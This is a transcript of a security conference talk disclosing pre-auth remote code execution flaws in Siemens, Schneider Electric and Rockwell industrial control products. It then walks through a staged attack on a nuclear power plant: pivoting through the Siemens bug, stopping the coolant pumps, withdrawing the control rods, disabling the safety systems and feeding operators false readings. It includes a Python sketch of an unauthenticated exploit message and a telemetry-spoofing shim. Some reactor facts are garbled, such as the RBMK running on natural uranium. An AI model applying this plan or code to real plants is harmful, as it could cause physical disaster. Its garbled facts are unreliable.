 So my name is Joe Bingham. I'm going to talk about some ICS vulnerabilities that we found. I'm on the zero-day research team at Tenable — there's only about five or six of us. Over the last year or so we've been looking at a lot of ICS products, different SCADA targets in software and hardware, and we found about a dozen critical vulnerabilities scattered across the board. They're critical vulnerabilities because they provide unauthenticated or pre-auth remote code execution on the affected systems. So as we go through this talk, I'll describe four of them in a little bit of detail, and then we'll blow up a power plant. All right, the first one we'll look at is in Siemens Step 7. Step 7 has been around forever; they rebranded it as TIA Portal and its automation services. It's used in all aspects of ICS development and operation, from the design phase through implementation and all the way down to operations. TIA Portal has a suite of simulation tools, it does diagnostics and telemetry, it does energy management, so it's used in operation in all sorts of different industries — down on the plant floor, just for monitoring equipment. And it's built for use by engineers, by integrators, and by operator personnel. The vuln that we found in the software exists in the authentication package of the server. TIA Portal has a Node.js server and implements functionality for authenticating web users and administrators. After authentication, the SSL session is switched over to WebSockets, but the token that was validated during authentication isn't checked in the WebSockets session. So of course, you can just skip HTTP authentication and start sending WebSockets commands directly to the server, and it will process them. And of course, all administrator functionality is included in the WebSockets protocol. So what can you do with that? You can do a number of things. 
You can basically do anything that an administrator would want to do on the system. But the best thing an attacker could do is start a firmware update — you can specify the firmware update server, so basically you can ask the server to execute code from any remote URL. You can also do a couple of other things, like modify permissions for users, create new users, change application proxy settings, or collect system information. So we have a disastrous security hole in Siemens software that's used on the plant floor in critical operations. As we go through these vulns, I'm going to show different POCs, and those are all on the Tenable GitHub repository — you can find exploits for all of these vulnerabilities there. And I guess while we're talking about Siemens: earlier today at Black Hat, researchers from Tel Aviv University were looking at the SIMATIC PLCs, and they found some other crazy vulnerabilities — basically anyone can come in and reprogram the PLCs if they're set up with the default permissions, because they all share private keys. So Siemens — I don't know what to say about Siemens. The second one we'll talk about is in Schneider Electric's InduSoft Web Studio. Earlier this year, we found that InduSoft has several vulnerabilities, including one that allows an attacker to send unauthenticated commands to the application. Specifically, command 66 is used to configure the database connection for InduSoft, and in many of the code paths the file name can actually be user-supplied. So in this command 66 message, an unauthenticated attacker can specify a database configuration file and ask the server to update from that file. The InduSoft server then parses the malicious update file and executes the values wrapped in brackets via WinExec. So an attacker can place arbitrary commands inside the database configuration file to run remote code on any InduSoft Web Studio server. 
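To make the shape of that attack concrete, here's a minimal sketch of framing an unauthenticated "command 66" request. The opcode position, length field, and framing below are illustrative assumptions for demonstration — not the real InduSoft wire format — and the UNC path is a placeholder:

```python
import struct

# Hypothetical sketch of an unauthenticated "command 66" message.
# The real InduSoft protocol layout differs; the header fields here
# (1-byte opcode, 2-byte little-endian payload length) are assumptions.
CMD_DB_CONFIG_UPDATE = 66  # the database-configuration command discussed above

def build_db_update_message(config_path: str) -> bytes:
    """Frame a command-66 request pointing the server at an
    attacker-controlled database configuration file (e.g. a UNC path)."""
    payload = config_path.encode("ascii") + b"\x00"          # NUL-terminated path
    header = struct.pack("<BH", CMD_DB_CONFIG_UPDATE, len(payload))
    return header + payload

# The config file the server then fetches would carry a bracketed value
# that ends up in WinExec, e.g. [calc.exe] -- again an illustrative stand-in.
msg = build_db_update_message(r"\\192.0.2.10\share\evil_db.cfg")
```

The point of the sketch is simply that nothing in the message authenticates the sender — the server acts on the file path alone.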
Our proof of concept for this, in Python, sets up a local SMB server and asks InduSoft Web Studio to trigger a database configuration update pointing at the attacker-controlled SMB server. The server requests the database configuration file and then runs the command embedded in it. We just used it to pop a calculator application. That's available on the GitHub — all of these will be. All right, the third one is also Schneider Electric, but in hardware. The Modicon Quantum PLCs are a kind of ubiquitous PLC hardware, used all over the place in different industries. They're favorites because they're modular — you can kind of plug and play them. They have all sorts of different interchangeable modules that you slide into the housing, depending on the needs of your application. One of the vulnerabilities we found in these PLCs, specifically in the communications module, is an authentication bypass that allows an attacker to administer the device without credentials. And here's the exploit for that. There it is — pretty easy, right? So apparently zero-days are easy. The exploit just uses a hidden service API of the communications module to change the administrator password without authentication. All right, last one. This vulnerability is in Rockwell Automation RSLinx. RSLinx Classic basically implements EtherNet/IP, which encapsulates Common Industrial Protocol (CIP) messages. In their implementation, the packet has a 24-byte header followed by some command-specific data, and the header lists the command and the length of the command-specific data. The vulnerability is a stack overflow caused by a malformed connection path: there's a function in the Engine.dll library in RSLinx which parses a connection path to extract a port path and stores it in a buffer on the stack. 
The length isn't verified, so you can specify up to 256 bytes of port path and overflow past the stack buffer. On 32-bit Windows, I think the return address is around 200 bytes from the beginning of the buffer, so it's a pretty easy stack overflow. All right, that's it — I hope that wasn't too bad. So let's look at the fun part, which is the application of these vulnerabilities, and I chose to look at a nuclear power plant. First things first, let me turn you all into nuclear physicists in one minute. Nuclear fission is a process where a large nucleus splits into two smaller nuclei, and when it splits, it releases energy. In these power plants we use uranium-235. Uranium-235 splits into krypton and barium, and with that it releases three more neutrons and it releases heat. Each of those neutrons can continue the chain reaction — and that's fission. That's it. Uranium-235 is the really useful isotope of uranium; uranium-238 is the main naturally occurring one. So when you hear about people enriching uranium, they're increasing the proportion of U-235 relative to the natural U-238, and that makes the fuel more chain-reactive. Remember those three neutrons produced in the reaction: they're exactly how the fission reaction is controlled, and they're the most important part of the chain reaction. So we know the fission reaction creates heat, and in these power plants the heat is used to boil water, which creates steam, and then the steam turns a turbine. And that's it — that's how the power is created. One minute, right? You're experts now. I don't know why they even teach this in school; you can just Google it. Why is nuclear engineering even a thing? Just kidding. So, the key players in a nuclear reactor. Number one, we have the fuel — that's the basis of the fission chain reaction. 
In nuclear power, it's uranium in general — sometimes plutonium, but almost all the time uranium. That's the thing that releases heat; it's the key element of fission. Then we have the moderator. Its job is to slow the neutrons down so the chain reaction can be sustained; in steady state, of the three neutrons that come out when a nucleus splits, roughly one goes on to cause the next fission while the rest are absorbed. Now the coolant — its only job is to take heat away from the core. That's it. The heat is the energy. And the fourth player is the control. That's the referee in the game: when the game starts getting too crazy and the fission reaction is getting out of control, you drop in the control elements. The control elements are generally cadmium, hafnium, or boron. All of those materials absorb massive amounts of neutrons, so they can completely shut down the fission reaction — almost always within seconds. We'll talk about those in more detail, but first let's get into some of the different designs of nuclear reactors. There are a lot of different designs, and I'll go through four or five of them. The first one is the pressurized water reactor, or PWR. This is by far the most prevalent reactor in use in the entire world. Almost all of the power plants in the U.S. are these; they're used in France, and also in Japan, Russia, and China. And as time goes on, more and more of them come online, just because they're so stable. Its little brother is the boiling water reactor, which is basically the same as the pressurized water reactor except that steam is created inside the core itself; in the PWR, the core stays fully liquid and steam is created in a separate heat exchanger. All right, now for the safety systems, I'll talk a little bit about an existing plant in Japan, Kashiwazaki-Kariwa, which came online within the last decade or so. 
The control systems and the instrumentation are all on the same network — of course it's an air-gapped network, separate from the corporate intranet and one step further from the wider internet. You can see in this diagram that the control systems are fully automated, fully computer-controlled. They have separate response systems and redundant safety systems: the emergency core cooling system (ECCS), in the lower left, and the scram control-rod insertion, right below it to the right of the ECCS — those are the two referees, the control elements that shut down the reaction. The third type of reactor design is the pressurized heavy water reactor. Almost all of them are in Canada, where they call it the CANDU. It's kind of a modification of the PWR, but a somewhat different design: instead of light water — the PWR and BWR are called light water reactors because they use ordinary, filtered water — these use heavy water, which contains deuterium, another hydrogen isotope. Deuterium already has the extra neutron that light hydrogen would otherwise absorb, so there's reduced neutron absorption, which makes it easier to sustain the chain reaction. And that means they can use a different kind of fuel: they don't have to use enriched uranium, so they can use naturally occurring uranium or uranium at a lower enrichment level. The upside is that the fuel is cheaper, but the cost is that the design is much less stable. You end up with edge cases where reactivity can actually increase as the water starts to boil. 
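That edge case — reactivity rising as the coolant boils — can be illustrated with a toy feedback loop. To be clear, the constants below are invented for demonstration and bear no relation to real reactor physics; the point is only the sign of the feedback:

```python
# Toy illustration of a positive void coefficient. All numbers are
# made up for demonstration; only the direction of the feedback matters.
def step(power: float, void_fraction: float) -> tuple[float, float]:
    """One time step: more power boils more coolant (higher void fraction),
    and with a positive void coefficient, more void raises reactivity."""
    void_fraction = min(1.0, void_fraction + 0.01 * power)   # boiling from heat
    reactivity = 1.0 + 0.05 * void_fraction                  # positive feedback term
    return power * reactivity, void_fraction

power, void = 1.0, 0.0
history = []
for _ in range(50):
    power, void = step(power, void)
    history.append(power)

# With positive feedback the power only ever ratchets upward -- the runaway
# described above. Flipping the sign (reactivity = 1.0 - 0.05 * void_fraction),
# as in a light water design, makes the same loop settle instead of diverge.
```

This is exactly why the sign of the void coefficient matters so much in the designs discussed below.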
And what that means is that an attacker with modification access, in this presumed attack scenario, can manipulate the safety systems to create a situation in the core where you get what they call a runaway fission reaction: reactivity increases in a feedback loop, where as the temperature keeps going up, the fission reaction keeps speeding up. That's exactly what happened at Chernobyl, if you're familiar with that. All right, so in the PHWR — the CANDU nuclear power plant — they're obviously aware that they can have this reactivity runaway, so the safety systems are incredibly durable, or so they say. This is a diagram from the U.S. NRC. The United States Nuclear Regulatory Commission does studies on what they call diversification in the safety systems, and diversification means there are no common ways the systems can fail — one vulnerability can't shut down both safety systems. In this case, we have two referees, two of these safety systems: SDS-1, the absorption rods, made of boron, which drop into the core and completely shut off the fission reaction; and SDS-2, boric acid injection, where several injectors on the side of the core spray in boric acid to increase the level of boron in the liquid, which also absorbs all the neutrons and immediately stops the fission reaction. The point, I guess, is that the safety system relies on computer control through two redundant computers that manage information and alarms. They're all on the same network though, right? So you still have the same access vector. But the two critical safety systems use different operating systems, different architectures and processor hardware, and different languages — they're not allowed to use the same languages or executables. 
So for example, the absorption rods might run on Windows and the boric acid injection on Linux; SDS-1 might be written in Fortran, say, and SDS-2 in C++. That's what they call diversification in nuclear power plants. It goes as far as being developed and coded by separate teams: the software has the same design parameters, but it's coded by different people and run by different teams. So in the end, all it means to us is that you need one, maybe two more zero-days to exploit the system, right? But don't worry — you can use some of the ones that we found. All right, the second-to-last reactor type is the AGR; I just have to mention it. It's about the fourth most popular one in use. The advanced gas-cooled reactor — they use these in the UK. It uses natural uranium, and to deal with this problem of liquid boiling in the core — these void coefficients increasing reactivity — they just said, let's not use liquid, we'll use gas. So they use carbon dioxide as the coolant, and you don't have to worry about anything boiling; there's no such thing as a void coefficient issue. It's also pretty stable — comparable to the PWRs and BWRs — and those are in the UK. Then the last one we obviously have to mention is the Russian RBMK, which is just a horribly unstable design. They still use a few of them — that slide has a typo; I think there are only three of them left in Russia. They use natural uranium, which, as temperature goes up, increases in reactivity, which is a bad thing. It uses graphite as a moderator, with water as the coolant, and it has a positive void coefficient, meaning that as the liquid in the core boils off and creates steam, you get steam between the fuel rods instead of liquid, which increases reactivity. 
So as heat goes up, reactivity goes up — that's basically why Chernobyl exploded. A horrible design. They're trying to phase all of these out; Russia has spent the last decade or so building PWRs instead, but they still have some of these in action. Okay, so the attack scenario. I think I have to start going a little faster here — we've got about ten minutes. The attack scenario, right? The network is going to be an air-gapped network. You want to protect it; you have all this critical, very fragile equipment on it, so it's air-gapped. We need some kind of initial infection into some adjacent network — it could be a corporate or employee network — and that's fairly trivial, obviously. Once we're in the adjacent network, some kind of human interaction, or another propagation zero-day, would get us into the control network. And we've seen this before, so I don't need to spend too much time on it: Stuxnet used a Windows vuln over USB to jump the gap, and there are a lot of different ways we've seen other malware, like Triton, do this. Once we're in the network and running on an operator panel, for example, or one of the peripheral systems, we need to get onto a controller — that's where we actually have access to the PLCs, access to the control network, access to some of the safety systems. So we use another vulnerability, for example the first one I talked about, the Siemens one. In general, you have these controllers on the operational floor interfacing with the PLCs for data collection and telemetry, and, in the development cycle, for programming the PLCs. So we use that Siemens vulnerability to jump from the operator interface, this peripheral device, onto the controller. And once you have access to the controller, modifying logic becomes trivial. 
In production environments, you can accomplish that in a number of different ways. The malware implant could wrap, for example, the communications through the controlling server to modify control flow and automate function changes — similar to what we saw with Stuxnet. For our attack on the power plant, we first need to be able to stop the coolant pumps. That reduces heat exchange out of the core, and that's the most dangerous thing: as the core temperature increases, it's going to start to melt down. In the extreme cases of the really bad designs I told you about, fission reactivity increases, and within minutes you could have a disastrous explosion. So number one, stop the coolant pumps — stop heat transfer out of the core. Secondly, we need to be able to withdraw control rods to increase fission. And thirdly, we need to be able to stop the safety systems — the ones where the control rods are inserted and boric acid is sprayed into the core. Those are on different redundant systems, but they all go through some common logic collector, which ends up being the thing that decides whether or not to trigger the safety systems. Another integral part of a successful attack on one of these power plants is providing false telemetry to the operators. You give the illusion of control to the people monitoring the safety systems, the temperature controls, and the pressure displays. You tell them everything is okay inside the core while in reality things are reaching some critical threshold. During that time period, you don't want anyone to respond, so you buy yourself time to create this awful situation where fission can get onto this runaway path. 
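The false-telemetry step can be sketched as a tiny shim that lets the real state escalate while feeding the display a believable nominal value. Everything here — the class, the temperatures, the noise band — is a hypothetical illustration, not code from any real implant or HMI:

```python
import random

# Toy sketch of false telemetry: the real core temperature climbs while
# the operator display is fed plausible values from the normal band.
# All names and numbers are hypothetical illustrations.
NOMINAL_C = 310.0  # pretend "everything is fine" core temperature

class TelemetryShim:
    def __init__(self):
        self.true_temp_c = NOMINAL_C
        random.seed(1)  # deterministic for the demo

    def physical_step(self):
        """Reality: coolant pumps are off, so the core keeps heating up."""
        self.true_temp_c += 5.0

    def operator_reading(self) -> float:
        """What the HMI sees: nominal temperature plus believable noise."""
        return NOMINAL_C + random.uniform(-1.5, 1.5)

shim = TelemetryShim()
displayed = []
for _ in range(20):
    shim.physical_step()
    displayed.append(shim.operator_reading())
# After 20 steps the core is 100 degrees hotter, yet every displayed
# reading still sits within a couple of degrees of nominal.
```

The small random jitter is the design point: a flat, frozen reading would look suspicious, while noisy-but-nominal values keep operators from responding.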
You can do that by simulating logic inside the implant to send pre-calculated temperatures, or even real-time simulated temperature, pressure, and power readings based on the operator's commands. So as the plant operator attempts to move control rods, for example, to control the fission reaction, the implant sends back simulated signals saying yes, the control rods are moving — even though we have control of them. All right, and then the last critical part of the attack is to disable the redundant manual and automatic safety measures. The malware can replace logic inside the ECCS as well as the scram control-rod insertion — those are the two independent and diverse safety systems that we talked about. That's an NRC regulation; all power plants do that. They have separate — separate, not equal, just separate — systems which are each able to completely shut down the fission reaction. And by disabling the safety systems, we buy that extra five minutes, or even an hour in some cases, to set the reactor core onto a path where it's eventually going to melt down or explode. Worst case scenario: I'll talk about the RBMK, since there are still three of them in action. They're all in Russia, and they're extremely unstable. They have this design parameter where fission can end up in a thermal feedback loop that makes it run out of control, and they rely entirely on logical control systems inside the control networks to maintain stability. So if an attacker achieves control of the safety and control systems, they can very easily cause a catastrophic explosion. Another power plant design that would be vulnerable is the CANDU, or PHWR — the pressurized heavy water reactor, which uses deuterium. Those are used in Canada and India. They're more stable than the RBMKs, but still less stable than the light water reactors we use in the U.S. 
Because they use unenriched uranium as fuel, fission reactivity can increase and you can get a runaway fission reaction. And then the last case we have to talk about is the U.S. These power plants are much more stable — you can't get a runaway fission reaction where you'd have some crazy fission explosion inside the core — but you can still melt them down. Fukushima and Three Mile Island were both light water reactors, and the only reason they melted down was that the coolant stopped. They use light water as a moderator, and they're designed to make it impossible to create a circumstance where the fission reaction grows uncontrolled: as conditions in the core intensify, reactivity always decreases. As temperature goes up, the fission reaction slows down. That's how they're designed — for stability first and cost later. So, ending the talk, I'll just say that the talk is kind of based on fear and uncertainty, but as I studied and looked through this, I found that nuclear power is good. It's clean energy; almost one-fifth of all the power in the U.S. is created through nuclear, so I just have to throw that in there. And I should also say that this type of attack, using our vulnerabilities, could have targeted any industry — I just chose this one for our simulation — with a similarly disastrous effect. So it's not nuclear power that's bad, right? It's the vulnerabilities, and this is a reminder about these critical systems: basically everything is vulnerable. All right, remember to check out our GitHub — we have POCs for all of these exploits there. You can ask me any questions you want, and I'll also be available on Twitter. Thank you guys very much.